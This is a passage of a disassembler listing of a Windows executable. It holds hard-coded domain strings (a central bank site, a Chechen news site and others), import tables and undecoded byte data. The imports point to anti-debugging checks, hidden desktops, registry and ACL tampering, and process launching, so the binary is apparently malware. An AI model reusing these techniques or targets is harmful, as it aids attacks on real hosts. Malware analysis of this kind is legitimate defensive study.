; .text:0043C13C�o
aWww_cbr_ru db 'www.cbr.ru',0 ; DATA XREF: .text:0043C0D4�o
aProdexteam_net db 'prodexteam.net/main.htm',0 ; DATA XREF: .text:0043C0D0�o
aProdexteam_n_1 db 'prodexteam.net',0 ; DATA XREF: .text:0043C0CC�o
aChechenpress_i db 'chechenpress.info',0 ; DATA XREF: .text:0043C0C8�o
aSiliconfirewar db 'siliconfireware.ru',0 ; DATA XREF: .text:off_43C0C4�o
db '://',0
align 4
loc_447ACC: ; DATA XREF: sub_406D2E+D4�o
and eax, 0CB332C44h
rcl byte ptr es:[ecx], 1
mov ah, 83h
add al, al
dec edi
fld dword ptr [ecx]
loc_447ADB: ; DATA XREF: sub_406D2E+4C8�o
; sub_406D2E+92D�o
sbb edi, edi
icebp
push eax
xor [ebp-44EE3068h], dh
add byte ptr [eax], 0AAh
loc_447AE8: ; DATA XREF: sub_406D2E+865�o
add [ebp-0E08F432h], bh
push eax
xor [ebp-44EE3068h], dh
add byte ptr [eax], 0AAh
loc_447AF8: ; DATA XREF: sub_406D2E+2E5�o
add [ebp+44270BCEh], bh
sub al, 33h
retf
; ---------------------------------------------------------------------------
db 26h, 0D0h, 11h
dd 0C00083B4h, 1901D94Fh
dword_447B0C dd 85CB6900h, 11CF4D95h, 80000C96h, 85EEF4C7h; IID riid
riid dd 0 ; Data1 ; DATA XREF: sub_40696D+52�o
dw 0 ; Data2
dw 0 ; Data3
db 0C0h, 6 dup(0), 46h ; Data4
dword_447B2C dd 0D30C1661h, 11D0CDAFh, 0C0003E8Ah, 6EE2C94Fhdword_447B3C dd 10h dup(0) ; sub_40BCDC:loc_40BCF6�o ...
dword_447B7C dd 0 ; sub_40BC80:loc_40BCC2�o ...
dd 0Fh dup(0)
dword_447BBC dd 0 ; sub_40BDE5+825�r
dword_447BC0 dd 0 ; sub_40BDE5+82C�r
dword_447BC4 dd 0 ; sub_40BDE5+834�r
dword_447BC8 dd 0 ; sub_40BDE5+83C�r
dd 10Dh dup(0)
off_448000 dd offset dword_44810C ; DATA XREF: .text:00448E00�o
dd 2 dup(0)
dd offset dword_44810C
dd offset dword_44810C
dd offset dword_44811C
align 10h
dd offset dword_44811C
dd offset dword_44811C
off_448028 dd offset dword_448134 ; DATA XREF: .text:00448E24�o
; .text:00448E28�o ...
dd 2 dup(0)
dd offset dword_448134
dd offset dword_448134
off_44803C dd offset dword_448214 ; DATA XREF: .text:00448E44�o
; .text:00448E48�o ...
dd 2 dup(0)
dd offset dword_448214
dd offset dword_448214
dd offset dword_448290
dd 2 dup(0)
dd offset dword_448290
dd offset dword_448290
dd offset dword_4482AC
align 10h
dd offset dword_4482AC
dd offset dword_4482AC
off_448078 dd offset dword_4482E8 ; DATA XREF: .text:00448FCC�o
; .text:00448FD0�o ...
dd 2 dup(0)
dd offset dword_4482E8
dd offset dword_4482E8
dd offset dword_448338
dd 2 dup(0)
dd offset dword_448338
dd offset dword_448338
dd 1Ah dup(0)
dd 48574h
dword_44810C dd 2 dup(0) ; .text:0044800C�o ...
dd 48588h, 485A4h
dword_44811C dd 2 dup(0) ; .text:00448020�o ...
dd 485C0h, 485D4h, 485E8h, 485F8h
dword_448134 dd 2 dup(0) ; .text:00448034�o ...
dd 4860Ch, 4861Ch, 4862Ch, 48648h, 4865Ch, 48674h, 4868Ch
dd 4869Ch, 486ACh, 486BCh, 486D4h, 486E8h, 486FCh, 48710h
dd 48728h, 48738h, 48748h, 48758h, 48768h, 48778h, 48790h
dd 487A8h, 487BCh, 487D0h, 487E4h, 487FCh, 48814h, 48824h
dd 48834h, 48848h, 48858h, 48864h, 48874h, 48880h, 48890h
dd 488A0h, 488ACh, 488B8h, 488C8h, 488D8h, 488ECh, 488FCh
dd 48904h, 48918h, 48928h, 48938h, 48948h, 48960h, 4896Ch
dd 48978h, 48988h, 48994h, 489A0h, 489B4h
dword_448214 dd 2 dup(0) ; .text:00448048�o ...
dd 489C4h, 489D8h, 489ECh, 489FCh, 48A0Ch, 48A18h, 48A28h
dd 48A34h, 48A4Ch, 48A5Ch, 48A68h, 48A74h, 48A84h, 48A94h
dd 48AA8h, 48ABCh, 48AD0h, 48AE4h, 48AF8h, 48B0Ch, 48B20h
dd 48B2Ch, 48B3Ch, 48B50h, 48B64h, 48B74h, 48B88h, 48B98h
dd 48BA8h
dword_448290 dd 2 dup(0) ; .text:0044805C�o ...
dd 48BBCh, 48BD0h, 48BE0h, 48BF0h, 48C08h
dword_4482AC dd 2 dup(0) ; .text:00448070�o ...
dd 48C18h, 48C2Ch, 48C44h, 48C58h, 48C68h, 48C78h, 48C8Ch
dd 48CA0h, 48CB4h, 48CC8h, 48CDCh, 48CF8h, 48D10h
dword_4482E8 dd 2 dup(0) ; .text:00448084�o ...
dd 48D2Ch, 48D34h, 48D44h, 48D50h, 48D5Ch, 48D64h, 48D6Ch
dd 48D78h, 48D84h, 48D90h, 48D98h, 48DA0h, 48DACh, 48DB8h
dd 48DC0h, 48DCCh, 48DD8h, 48DE4h
dword_448338 dd 2 dup(0) ; .text:00448098�o ...
_text ends
;
; Imports from oleaut32.dll
;
; ===========================================================================
; Segment type: Externs
; _idata
; BSTR __stdcall SysAllocString(const OLECHAR *psz)
extrn __imp_SysAllocString:dword ; DATA XREF: SysAllocString�r
;
; Imports from wininet.dll
;
extrn __imp_FindFirstUrlCacheEntryA:dword
; DATA XREF: FindFirstUrlCacheEntryA�r
extrn __imp_FindNextUrlCacheEntryA:dword
; DATA XREF: FindNextUrlCacheEntryA�r
;
; Imports from ole32.dll
;
; HRESULT __stdcall CoCreateInstance(const IID *const rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, const IID *const riid, LPVOID *ppv)
extrn __imp_CoCreateInstance:dword ; DATA XREF: CoCreateInstance�r
; HRESULT __stdcall CLSIDFromString(LPOLESTR lpsz, LPCLSID pclsid)
extrn __imp_CLSIDFromString:dword ; DATA XREF: CLSIDFromString�r
; HRESULT __stdcall CoInitialize(LPVOID pvReserved)
extrn __imp_CoInitialize:dword ; DATA XREF: CoInitialize�r
; void __stdcall CoUninitialize()
extrn __imp_CoUninitialize:dword ; DATA XREF: CoUninitialize�r
;
; Imports from kernel32.dll
;
; BOOL __stdcall DeleteFileA(LPCSTR lpFileName)
extrn __imp_DeleteFileA:dword ; DATA XREF: DeleteFileA�r
; void __stdcall ExitProcess(UINT uExitCode)
extrn __imp_ExitProcess:dword ; DATA XREF: ExitProcess�r
; DWORD __stdcall ExpandEnvironmentStringsA(LPCSTR lpSrc, LPSTR lpDst, DWORD nSize)
extrn __imp_ExpandEnvironmentStringsA:dword
; DATA XREF: ExpandEnvironmentStringsA�r
; LPSTR __stdcall GetCommandLineA()
extrn __imp_GetCommandLineA:dword ; DATA XREF: GetCommandLineA�r
; DWORD __stdcall GetCurrentProcessId()
extrn __imp_GetCurrentProcessId:dword ; DATA XREF: GetCurrentProcessId�r
; DWORD __stdcall GetCurrentThreadId()
extrn __imp_GetCurrentThreadId:dword ; DATA XREF: GetCurrentThreadId�r
; DWORD __stdcall GetFileSize(HANDLE hFile, LPDWORD lpFileSizeHigh)
extrn __imp_GetFileSize:dword ; DATA XREF: GetFileSize�r
; BOOL __stdcall GetFileTime(HANDLE hFile, LPFILETIME lpCreationTime, LPFILETIME lpLastAccessTime, LPFILETIME lpLastWriteTime)
extrn __imp_GetFileTime:dword ; DATA XREF: GetFileTime�r
; DWORD __stdcall GetLastError()
extrn __imp_GetLastError:dword ; DATA XREF: GetLastError�r
; DWORD __stdcall GetModuleFileNameA(HMODULE hModule, LPCH lpFilename, DWORD nSize)
extrn __imp_GetModuleFileNameA:dword ; DATA XREF: GetModuleFileNameA�r
; HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName)
extrn __imp_GetModuleHandleA:dword ; DATA XREF: GetModuleHandleA�r
; FARPROC __stdcall GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
extrn __imp_GetProcAddress:dword ; DATA XREF: GetProcAddress�r
; HANDLE __stdcall GetProcessHeap()
extrn __imp_GetProcessHeap:dword ; DATA XREF: GetProcessHeap�r
; UINT __stdcall GetSystemDirectoryA(LPSTR lpBuffer, UINT uSize)
extrn __imp_GetSystemDirectoryA:dword ; DATA XREF: GetSystemDirectoryA�r
; BOOL __stdcall CloseHandle(HANDLE hObject)
extrn __imp_CloseHandle:dword ; DATA XREF: CloseHandle�r
; DWORD __stdcall GetTempPathA(DWORD nBufferLength, LPSTR lpBuffer)
extrn __imp_GetTempPathA:dword ; DATA XREF: GetTempPathA�r
; DWORD __stdcall GetTickCount()
extrn __imp_GetTickCount:dword ; DATA XREF: GetTickCount�r
; DWORD __stdcall GetVersion()
extrn __imp_GetVersion:dword ; DATA XREF: GetVersion�r
; BOOL __stdcall GetVersionExA(LPOSVERSIONINFOA lpVersionInformation)
extrn __imp_GetVersionExA:dword ; DATA XREF: GetVersionExA�r
; BOOL __stdcall GetVolumeInformationA(LPCSTR lpRootPathName, LPSTR lpVolumeNameBuffer, DWORD nVolumeNameSize, LPDWORD lpVolumeSerialNumber, LPDWORD lpMaximumComponentLength, LPDWORD lpFileSystemFlags, LPSTR lpFileSystemNameBuffer, DWORD nFileSystemNameSize)
extrn __imp_GetVolumeInformationA:dword ; DATA XREF: GetVolumeInformationA�r
; UINT __stdcall GetWindowsDirectoryA(LPSTR lpBuffer, UINT uSize)
extrn __imp_GetWindowsDirectoryA:dword ; DATA XREF: GetWindowsDirectoryA�r
; ATOM __stdcall GlobalAddAtomA(LPCSTR lpString)
extrn __imp_GlobalAddAtomA:dword ; DATA XREF: GlobalAddAtomA�r
; ATOM __stdcall GlobalDeleteAtom(ATOM nAtom)
extrn __imp_GlobalDeleteAtom:dword ; DATA XREF: GlobalDeleteAtom�r
; ATOM __stdcall GlobalFindAtomA(LPCSTR lpString)
extrn __imp_GlobalFindAtomA:dword ; DATA XREF: GlobalFindAtomA�r
; void __stdcall GlobalMemoryStatus(LPMEMORYSTATUS lpBuffer)
extrn __imp_GlobalMemoryStatus:dword ; DATA XREF: GlobalMemoryStatus�r
; LONG __stdcall InterlockedIncrement(volatile LONG *lpAddend)
extrn __imp_InterlockedIncrement:dword ; DATA XREF: InterlockedIncrement�r
; BOOL __stdcall IsBadReadPtr(const void *lp, UINT_PTR ucb)
extrn __imp_IsBadReadPtr:dword ; DATA XREF: IsBadReadPtr�r
; BOOL __stdcall IsBadWritePtr(LPVOID lp, UINT_PTR ucb)
extrn __imp_IsBadWritePtr:dword ; DATA XREF: IsBadWritePtr�r
; BOOL __stdcall IsDebuggerPresent()
extrn __imp_IsDebuggerPresent:dword ; DATA XREF: IsDebuggerPresent�r
; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
extrn __imp_LoadLibraryA:dword ; DATA XREF: LoadLibraryA�r
; BOOL __stdcall CopyFileA(LPCSTR lpExistingFileName, LPCSTR lpNewFileName, BOOL bFailIfExists)
extrn __imp_CopyFileA:dword ; DATA XREF: CopyFileA�r
; HLOCAL __stdcall LocalAlloc(UINT uFlags, SIZE_T uBytes)
extrn __imp_LocalAlloc:dword ; DATA XREF: LocalAlloc�r
; HLOCAL __stdcall LocalFree(HLOCAL hMem)
extrn __imp_LocalFree:dword ; DATA XREF: LocalFree�r
; HANDLE __stdcall OpenMutexA(DWORD dwDesiredAccess, BOOL bInheritHandle, LPCSTR lpName)
extrn __imp_OpenMutexA:dword ; DATA XREF: OpenMutexA�r
; HANDLE __stdcall OpenProcess(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId)
extrn __imp_OpenProcess:dword ; DATA XREF: OpenProcess�r
; BOOL __stdcall ReadFile(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped)
extrn __imp_ReadFile:dword ; DATA XREF: ReadFile�r
extrn __imp_RtlUnwind:dword ; DATA XREF: RtlUnwind�r
extrn __imp_RtlZeroMemory:dword ; DATA XREF: RtlZeroMemory�r
; HANDLE __stdcall CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile)
extrn __imp_CreateFileA:dword ; DATA XREF: CreateFileA�r
; DWORD __stdcall SetFilePointer(HANDLE hFile, LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod)
extrn __imp_SetFilePointer:dword ; DATA XREF: SetFilePointer�r
; BOOL __stdcall SetFileTime(HANDLE hFile, const FILETIME *lpCreationTime, const FILETIME *lpLastAccessTime, const FILETIME *lpLastWriteTime)
extrn __imp_SetFileTime:dword ; DATA XREF: SetFileTime�r
; void __stdcall Sleep(DWORD dwMilliseconds)
extrn __imp_Sleep:dword ; DATA XREF: Sleep�r
; BOOL __stdcall TerminateProcess(HANDLE hProcess, UINT uExitCode)
extrn __imp_TerminateProcess:dword ; DATA XREF: TerminateProcess�r
; LPVOID __stdcall VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
extrn __imp_VirtualAlloc:dword ; DATA XREF: VirtualAlloc�r
; BOOL __stdcall VirtualFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType)
extrn __imp_VirtualFree:dword ; DATA XREF: VirtualFree�r
; SIZE_T __stdcall VirtualQuery(LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength)
extrn __imp_VirtualQuery:dword ; DATA XREF: VirtualQuery�r
; int __stdcall WideCharToMultiByte(UINT CodePage, DWORD dwFlags, LPCWSTR lpWideCharStr, int cchWideChar, LPSTR lpMultiByteStr, int cbMultiByte, LPCSTR lpDefaultChar, LPBOOL lpUsedDefaultChar)
extrn __imp_WideCharToMultiByte:dword ; DATA XREF: WideCharToMultiByte�r
; UINT __stdcall WinExec(LPCSTR lpCmdLine, UINT uCmdShow)
extrn __imp_WinExec:dword ; DATA XREF: WinExec�r
; BOOL __stdcall WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped)
extrn __imp_WriteFile:dword ; DATA XREF: WriteFile�r
; HANDLE __stdcall CreateMutexA(LPSECURITY_ATTRIBUTES lpMutexAttributes, BOOL bInitialOwner, LPCSTR lpName)
extrn __imp_CreateMutexA:dword ; DATA XREF: CreateMutexA�r
; int __stdcall lstrlenA(LPCSTR lpString)
extrn __imp_lstrlenA:dword ; DATA XREF: lstrlenA�r
; int __stdcall lstrlenW(LPCWSTR lpString)
extrn __imp_lstrlenW:dword ; DATA XREF: lstrlenW�r
; BOOL __stdcall CreateProcessA(LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation)
extrn __imp_CreateProcessA:dword ; DATA XREF: CreateProcessA�r
; HANDLE __stdcall CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId)
extrn __imp_CreateThread:dword ; DATA XREF: CreateThread�r
;
; Imports from user32.dll
;
; LRESULT __stdcall CallWindowProcA(WNDPROC lpPrevWndFunc, HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
extrn __imp_CallWindowProcA:dword ; DATA XREF: CallWindowProcA�r
; int __stdcall GetWindowTextA(HWND hWnd, LPSTR lpString, int nMaxCount)
extrn __imp_GetWindowTextA:dword ; DATA XREF: GetWindowTextA�r
; BOOL __stdcall GetWindowRect(HWND hWnd, LPRECT lpRect)
extrn __imp_GetWindowRect:dword ; DATA XREF: GetWindowRect�r
; HWND __stdcall FindWindowA(LPCSTR lpClassName, LPCSTR lpWindowName)
extrn __imp_FindWindowA:dword ; DATA XREF: FindWindowA�r
; HWND __stdcall GetWindow(HWND hWnd, UINT uCmd)
extrn __imp_GetWindow:dword ; DATA XREF: GetWindow�r
; int __stdcall GetClassNameA(HWND hWnd, LPSTR lpClassName, int nMaxCount)
extrn __imp_GetClassNameA:dword ; DATA XREF: GetClassNameA�r
; HWND __stdcall SetFocus(HWND hWnd)
extrn __imp_SetFocus:dword ; DATA XREF: SetFocus�r
; HWND __stdcall GetForegroundWindow()
extrn __imp_GetForegroundWindow:dword ; DATA XREF: GetForegroundWindow�r
; HCURSOR __stdcall LoadCursorA(HINSTANCE hInstance, LPCSTR lpCursorName)
extrn __imp_LoadCursorA:dword ; DATA XREF: LoadCursorA�r
; UINT_PTR __stdcall SetTimer(HWND hWnd, UINT_PTR nIDEvent, UINT uElapse, TIMERPROC lpTimerFunc)
extrn __imp_SetTimer:dword ; DATA XREF: SetTimer�r
; HICON __stdcall LoadIconA(HINSTANCE hInstance, LPCSTR lpIconName)
extrn __imp_LoadIconA:dword ; DATA XREF: LoadIconA�r
; int __stdcall MessageBoxA(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType)
extrn __imp_MessageBoxA:dword ; DATA XREF: MessageBoxA�r
; BOOL __stdcall GetMessageA(LPMSG lpMsg, HWND hWnd, UINT wMsgFilterMin, UINT wMsgFilterMax)
extrn __imp_GetMessageA:dword ; DATA XREF: GetMessageA�r
; LONG __stdcall GetWindowLongA(HWND hWnd, int nIndex)
extrn __imp_GetWindowLongA:dword ; DATA XREF: GetWindowLongA�r
; LONG __stdcall SetWindowLongA(HWND hWnd, int nIndex, LONG dwNewLong)
extrn __imp_SetWindowLongA:dword ; DATA XREF: SetWindowLongA�r
; HDESK __stdcall CreateDesktopA(LPCSTR lpszDesktop, LPCSTR lpszDevice, LPDEVMODEA pDevmode, DWORD dwFlags, ACCESS_MASK dwDesiredAccess, LPSECURITY_ATTRIBUTES lpsa)
extrn __imp_CreateDesktopA:dword ; DATA XREF: CreateDesktopA�r
; BOOL __stdcall SetThreadDesktop(HDESK hDesktop)
extrn __imp_SetThreadDesktop:dword ; DATA XREF: SetThreadDesktop�r
; HDESK __stdcall GetThreadDesktop(DWORD dwThreadId)
extrn __imp_GetThreadDesktop:dword ; DATA XREF: GetThreadDesktop�r
; BOOL __stdcall TranslateMessage(const MSG *lpMsg)
extrn __imp_TranslateMessage:dword ; DATA XREF: TranslateMessage�r
; LRESULT __stdcall DispatchMessageA(const MSG *lpMsg)
extrn __imp_DispatchMessageA:dword ; DATA XREF: DispatchMessageA�r
; int wsprintfA(LPSTR, LPCSTR, ...)
extrn __imp_wsprintfA:dword ; DATA XREF: wsprintfA�r
; LRESULT __stdcall SendMessageA(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
extrn __imp_SendMessageA:dword ; DATA XREF: SendMessageA�r
; ATOM __stdcall RegisterClassA(const WNDCLASSA *lpWndClass)
extrn __imp_RegisterClassA:dword ; DATA XREF: RegisterClassA�r
; void __stdcall PostQuitMessage(int nExitCode)
extrn __imp_PostQuitMessage:dword ; DATA XREF: PostQuitMessage�r
; BOOL __stdcall ShowWindow(HWND hWnd, int nCmdShow)
extrn __imp_ShowWindow:dword ; DATA XREF: ShowWindow�r
; HWND __stdcall CreateWindowExA(DWORD dwExStyle, LPCSTR lpClassName, LPCSTR lpWindowName, DWORD dwStyle, int X, int Y, int nWidth, int nHeight, HWND hWndParent, HMENU hMenu, HINSTANCE hInstance, LPVOID lpParam)
extrn __imp_CreateWindowExA:dword ; DATA XREF: CreateWindowExA�r
; BOOL __stdcall DestroyWindow(HWND hWnd)
extrn __imp_DestroyWindow:dword ; DATA XREF: DestroyWindow�r
; BOOL __stdcall MoveWindow(HWND hWnd, int X, int Y, int nWidth, int nHeight, BOOL bRepaint)
extrn __imp_MoveWindow:dword ; DATA XREF: MoveWindow�r
; LRESULT __stdcall DefWindowProcA(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
extrn __imp_DefWindowProcA:dword ; DATA XREF: DefWindowProcA�r
;
; Imports from gdi32.dll
;
; HGDIOBJ __stdcall GetStockObject(int i)
extrn __imp_GetStockObject:dword ; DATA XREF: GetStockObject�r
; COLORREF __stdcall SetBkColor(HDC hdc, COLORREF color)
extrn __imp_SetBkColor:dword ; DATA XREF: SetBkColor�r
; COLORREF __stdcall SetTextColor(HDC hdc, COLORREF color)
extrn __imp_SetTextColor:dword ; DATA XREF: SetTextColor�r
; HBRUSH __stdcall CreateBrushIndirect(const LOGBRUSH *plbrush)
extrn __imp_CreateBrushIndirect:dword ; DATA XREF: CreateBrushIndirect�r
; HFONT __stdcall CreateFontA(int cHeight, int cWidth, int cEscapement, int cOrientation, int cWeight, DWORD bItalic, DWORD bUnderline, DWORD bStrikeOut, DWORD iCharSet, DWORD iOutPrecision, DWORD iClipPrecision, DWORD iQuality, DWORD iPitchAndFamily, LPCSTR pszFaceName)
extrn __imp_CreateFontA:dword ; DATA XREF: CreateFontA�r
;
; Imports from advapi32.dll
;
; BOOL __stdcall OpenProcessToken(HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle)
extrn __imp_OpenProcessToken:dword ; DATA XREF: OpenProcessToken�r
; BOOL __stdcall GetTokenInformation(HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, LPVOID TokenInformation, DWORD TokenInformationLength, PDWORD ReturnLength)
extrn __imp_GetTokenInformation:dword ; DATA XREF: GetTokenInformation�r
; LSTATUS __stdcall RegCreateKeyExA(HKEY hKey, LPCSTR lpSubKey, DWORD Reserved, LPSTR lpClass, DWORD dwOptions, REGSAM samDesired, const LPSECURITY_ATTRIBUTES lpSecurityAttributes, PHKEY phkResult, LPDWORD lpdwDisposition)
extrn __imp_RegCreateKeyExA:dword ; DATA XREF: RegCreateKeyExA�r
; LSTATUS __stdcall RegCloseKey(HKEY hKey)
extrn __imp_RegCloseKey:dword ; DATA XREF: RegCloseKey�r
; LSTATUS __stdcall RegOpenKeyExA(HKEY hKey, LPCSTR lpSubKey, DWORD ulOptions, REGSAM samDesired, PHKEY phkResult)
extrn __imp_RegOpenKeyExA:dword ; DATA XREF: RegOpenKeyExA�r
; LSTATUS __stdcall RegQueryValueExA(HKEY hKey, LPCSTR lpValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData)
extrn __imp_RegQueryValueExA:dword ; DATA XREF: RegQueryValueExA�r
; LSTATUS __stdcall RegSetValueExA(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE *lpData, DWORD cbData)
extrn __imp_RegSetValueExA:dword ; DATA XREF: RegSetValueExA�r
; DWORD __stdcall GetSecurityInfo(HANDLE handle, SE_OBJECT_TYPE ObjectType, SECURITY_INFORMATION SecurityInfo, PSID *ppsidOwner, PSID *ppsidGroup, PACL *ppDacl, PACL *ppSacl, PSECURITY_DESCRIPTOR *ppSecurityDescriptor)
extrn __imp_GetSecurityInfo:dword ; DATA XREF: GetSecurityInfo�r
; DWORD __stdcall SetSecurityInfo(HANDLE handle, SE_OBJECT_TYPE ObjectType, SECURITY_INFORMATION SecurityInfo, PSID psidOwner, PSID psidGroup, PACL pDacl, PACL pSacl)
extrn __imp_SetSecurityInfo:dword ; DATA XREF: SetSecurityInfo�r
; DWORD __stdcall SetEntriesInAclA(ULONG cCountOfExplicitEntries, PEXPLICIT_ACCESS_A pListOfExplicitEntries, PACL OldAcl, PACL *NewAcl)
extrn __imp_SetEntriesInAclA:dword ; DATA XREF: SetEntriesInAclA�r
; PSID_IDENTIFIER_AUTHORITY __stdcall GetSidIdentifierAuthority(PSID pSid)
extrn __imp_GetSidIdentifierAuthority:dword
; DATA XREF: GetSidIdentifierAuthority�r
; PDWORD __stdcall GetSidSubAuthority(PSID pSid, DWORD nSubAuthority)
extrn __imp_GetSidSubAuthority:dword ; DATA XREF: GetSidSubAuthority�r
; PUCHAR __stdcall GetSidSubAuthorityCount(PSID pSid)
extrn __imp_GetSidSubAuthorityCount:dword
; DATA XREF: GetSidSubAuthorityCount�r
;
; Imports from crtdll.dll
;
; char *__cdecl _itoa(int Val, char *DstBuf, int Radix)
extrn __imp__itoa:dword ; DATA XREF: _itoa�r
extrn __imp___GetMainArgs:dword ; DATA XREF: __GetMainArgs�r
; void __cdecl _sleep(unsigned __int32 Duration)
extrn __imp__sleep:dword ; DATA XREF: _sleep�r
; int __cdecl _stricmp(const char *Str1, const char *Str2)
extrn __imp__stricmp:dword ; DATA XREF: _stricmp�r
; int __cdecl abs(int X)
extrn __imp_abs:dword ; DATA XREF: abs�r
; void __cdecl exit(int Code)
extrn __imp_exit:dword ; DATA XREF: exit�r
; int __cdecl memcmp(const void *Buf1, const void *Buf2, size_t Size)
extrn __imp_memcmp:dword ; DATA XREF: memcmp�r
; void *__cdecl memcpy(void *Dst, const void *Src, size_t Size)
extrn __imp_memcpy:dword ; DATA XREF: memcpy�r
; void *__cdecl memset(void *Dst, int Val, size_t Size)
extrn __imp_memset:dword ; DATA XREF: memset�r
extrn __imp_raise:dword ; DATA XREF: raise�r
; int __cdecl rand()
extrn __imp_rand:dword ; DATA XREF: rand�r
extrn __imp_signal:dword ; DATA XREF: signal�r
; int sprintf(char *Dest, const char *Format, ...)
extrn __imp_sprintf:dword ; DATA XREF: sprintf�r
; void __cdecl srand(unsigned int Seed)
extrn __imp_srand:dword ; DATA XREF: srand�r
; int sscanf(const char *Src, const char *Format, ...)
extrn __imp_sscanf:dword ; DATA XREF: sscanf�r
; char *__cdecl strcat(char *Dest, const char *Source)
extrn __imp_strcat:dword ; DATA XREF: strcat�r
; char *__cdecl strchr(const char *Str, int Val)
extrn __imp_strchr:dword ; DATA XREF: strchr�r
; int __cdecl strncmp(const char *Str1, const char *Str2, size_t MaxCount)
extrn __imp_strncmp:dword ; DATA XREF: strncmp�r
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 448570h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
dd 0
dd 79530046h, 6C6C4173h, 7453636Fh, 676E6972h, 0
dd 69460015h, 6946646Eh, 55747372h, 61436C72h, 45656863h
dd 7972746Eh, 41h, 6946001Ch, 654E646Eh, 72557478h, 6361436Ch
dd 6E456568h, 41797274h, 0
dd 6F43006Ah, 61657243h, 6E496574h, 6E617473h, 6563h, 4C43007Ch
dd 46444953h, 536D6F72h, 6E697274h, 67h, 6F430058h, 74696E49h
dd 696C6169h, 657Ah, 6F43005Bh, 6E696E55h, 61697469h, 657A696Ch
dd 0
dd 6544006Bh, 6574656Ch, 656C6946h, 41h, 7845009Bh, 72507469h
dd 7365636Fh, 73h, 7845009Dh, 646E6170h, 69766E45h, 6D6E6F72h
dd 53746E65h, 6E697274h, 417367h, 654700EDh, 6D6F4374h
dd 646E616Dh, 656E694Ch, 41h, 65470112h, 72754374h, 746E6572h
dd 636F7250h, 49737365h, 64h, 65470115h, 72754374h, 746E6572h
dd 65726854h, 64496461h, 0
dd 6547012Fh, 6C694674h, 7A695365h, 65h, 65470131h, 6C694674h
dd 6D695465h, 65h, 6547013Ch, 73614C74h, 72724574h, 726Fh
dd 65470147h, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 0
dd 65470149h, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 65470167h
dd 6F725074h, 64644163h, 73736572h, 0
dd 6547016Ah, 6F725074h, 73736563h, 70616548h, 0
dd 65470188h, 73795374h, 446D6574h, 63657269h, 79726F74h
dd 41h, 6C430027h, 4865736Fh, 6C646E61h, 65h, 6547019Ah
dd 6D655474h, 74615070h, 4168h, 654701A4h, 63695474h, 756F436Bh
dd 746Eh, 654701ACh, 72655674h, 6E6F6973h, 0
dd 654701ADh, 72655674h, 6E6F6973h, 417845h, 654701AFh
dd 6C6F5674h, 49656D75h, 726F666Eh, 6974616Dh, 416E6Fh
dd 654701B7h, 6E695774h, 73776F64h, 65726944h, 726F7463h
dd 4179h, 6C4701BAh, 6C61626Fh, 41646441h, 416D6F74h, 0
dd 6C4701BEh, 6C61626Fh, 656C6544h, 74416574h, 6D6Fh, 6C4701BFh
dd 6C61626Fh, 646E6946h, 6D6F7441h, 41h, 6C4701C8h, 6C61626Fh
dd 6F6D654Dh, 74537972h, 73757461h, 0
; ---------------------------------------------------------------------------
jmp short loc_4487FF
; ---------------------------------------------------------------------------
dec ecx
loc_4487FF: ; CODE XREF: .text:004487FC�j
outsb
jz short loc_448867
jb short near ptr loc_44886F+1
outsd
arpl [ebx+65h], bp
db 64h
dec ecx
outsb
arpl [edx+65h], si
insd
outs dx, byte ptr gs:[esi]
jz short $+2
add cl, dh
add [ecx+73h], ecx
inc edx
popa
db 64h
push edx
db 65h
popa
db 64h
push eax
jz short loc_448894
; ---------------------------------------------------------------------------
dw 0
db 0F4h ; ô
db 1, 49h, 73h
aBadwriteptr db 'BadWritePtr',0
db 0F7h ; ÷
db 1, 49h, 73h
aDebuggerpresen db 'DebuggerPresent',0
dd 6F4C0203h, 694C6461h, 72617262h, 4179h, 6F430033h, 69467970h
dd 41656Ch
; ---------------------------------------------------------------------------
or [edx], eax
dec esp
loc_448867: ; CODE XREF: .text:00448800�j
outsd
arpl [ecx+6Ch], sp
inc ecx
insb
insb
outsd
loc_44886F: ; CODE XREF: .text:00448802�j
arpl [eax], ax
; ---------------------------------------------------------------------------
db 3 dup(0)
